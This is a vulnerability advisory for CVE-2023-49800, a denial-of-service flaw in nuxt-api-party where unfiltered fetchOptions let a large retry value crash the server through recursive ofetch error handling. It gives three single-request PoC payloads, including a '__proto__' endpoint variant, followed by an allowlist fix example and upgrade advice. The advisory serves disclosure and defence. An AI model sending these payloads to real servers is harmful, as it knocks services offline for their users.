CVE-2023-49800
DOS by abusing `fetchOptions.retry`.
Description
### Summary

`nuxt-api-party` allows developers to proxy requests to an API without exposing credentials to the client. [`ofetch`](https://github.com/unjs/ofetch) is used to send the requests. The library allows the user to send many options directly to `ofetch`. There is no filter on which options are available. We can abuse the retry logic to cause the server to crash from a stack overflow.

### Details

`fetchOptions` [are obtained directly from the request body](https://github.com/johannschopplich/nuxt-api-party/blob/777462e1e3af1d9f8938aa33f230cd8cb6e0cc9a/src/runtime/server/handler.ts#L27). These are then [passed directly into `ofetch`](https://github.com/johannschopplich/nuxt-api-party/blob/777462e1e3af1d9f8938aa33f230cd8cb6e0cc9a/src/runtime/server/handler.ts#L57C15-L57C15). We can construct a URL we know will not fetch successfully, then set the retry attempts to a high value; this causes a stack overflow because ofetch error handling works recursively.

### PoC

PoC using Node.

```js
await fetch("http://localhost:3000/api/__api_party/MyEndpoint", {
  method: "POST",
  body: JSON.stringify({ path: "x:x", retry: 9999999 }),
  headers: { "Content-Type": "application/json" }
})
```

We can use `__proto__` as a substitute for the endpoint if it is not known.

```js
await fetch("http://localhost:3000/api/__api_party/__proto__", {
  method: "POST",
  body: JSON.stringify({ path: "x:x", retry: 9999999 }),
  headers: { "Content-Type": "application/json" }
})
```

We can build the size of the stack faster by using more complicated URIs.

```js
await fetch("http://localhost:3000/api/__api_party/__proto__", {
  method: "POST",
  body: JSON.stringify({ path: "data:x;base64,----", retry: 9999999 }),
  headers: { "Content-Type": "application/json" }
})
```

### Impact

Full DOS; the server is unusable during the attack. Requires a single request.

### Fix

Limit which options can be passed to `ofetch`.
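The fix described above, limiting which client-supplied options reach `ofetch`, as an added illustration that is not nuxt-api-party's own patch. It shows an allowlist applied to the request body (so `retry`, `timeout`, hooks and anything else that controls server-side behaviour are dropped and `retry` is fixed by server policy) and an endpoint lookup that ignores inherited keys such as `__proto__`. The function names (`buildProxyOptions`, `resolveEndpoint`), the `ENDPOINTS` registry and the option allowlist are assumptions made for the example.

```javascript
// Added example, not the project's code: allowlist the fetch options a client may set.
// Names below (buildProxyOptions, resolveEndpoint, ENDPOINTS) are hypothetical.

// Options a client is allowed to influence; everything else (retry, timeout,
// onRequest/onResponse hooks, baseURL, ...) is server policy and is discarded.
const ALLOWED_OPTIONS = new Set(["method", "query", "headers", "body"]);
const ALLOWED_METHODS = new Set(["GET", "POST", "PUT", "PATCH", "DELETE"]);
const SERVER_RETRY = 0; // retries are decided by the server, never by the request

// Constructed stand-in for the module's configured endpoints (not real values).
const ENDPOINTS = {
  MyEndpoint: { url: "https://api.example.invalid", token: "server-side-secret" },
};

// Resolve an endpoint by name using own-property lookup only, so names such as
// "__proto__" or "constructor" do not resolve to Object.prototype members.
function resolveEndpoint(name) {
  if (typeof name !== "string" || !Object.hasOwn(ENDPOINTS, name)) return null;
  return ENDPOINTS[name];
}

// Build the options object that will be handed to ofetch from a parsed JSON body.
// Keys outside the allowlist are silently dropped; retry is always overwritten.
function buildProxyOptions(body) {
  if (body === null || typeof body !== "object" || Array.isArray(body)) {
    throw new TypeError("request body must be a JSON object");
  }
  const opts = {};
  for (const key of Object.keys(body)) {
    if (!ALLOWED_OPTIONS.has(key)) continue; // drops retry, timeout, hooks, path, ...
    opts[key] = body[key];
  }
  if (opts.method !== undefined) {
    const method = String(opts.method).toUpperCase();
    if (!ALLOWED_METHODS.has(method)) throw new TypeError(`method not allowed: ${method}`);
    opts.method = method;
  }
  opts.retry = SERVER_RETRY;
  return opts;
}

// Keys that were present in the body but rejected; useful for logging and for
// detecting clients that probe server-side options.
function rejectedKeys(body) {
  if (body === null || typeof body !== "object" || Array.isArray(body)) return [];
  return Object.keys(body).filter((k) => !ALLOWED_OPTIONS.has(k));
}

// Constructed request body in the shape of the advisory's PoC.
const poc = JSON.parse('{"path":"x:x","retry":9999999,"headers":{"X-Trace":"1"}}');
console.log(buildProxyOptions(poc)); // retry is 0, path and the huge retry are gone
console.log(rejectedKeys(poc)); // ["path", "retry"]
console.log(resolveEndpoint("__proto__")); // null
```

`path` is handled on purpose outside the allowlist: it belongs to the proxy's own routing, not to the `ofetch` options, so it is read separately rather than forwarded as an option.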
How to fix CVE-2023-49800
To fix CVE-2023-49800, upgrade the affected package to the patched version listed below.
- `nuxt-api-party`: upgrade to 0.22.1 or later
Is CVE-2023-49800 being exploited?
Low: EPSS is 1.1%, and no large-scale exploitation activity has been observed so far.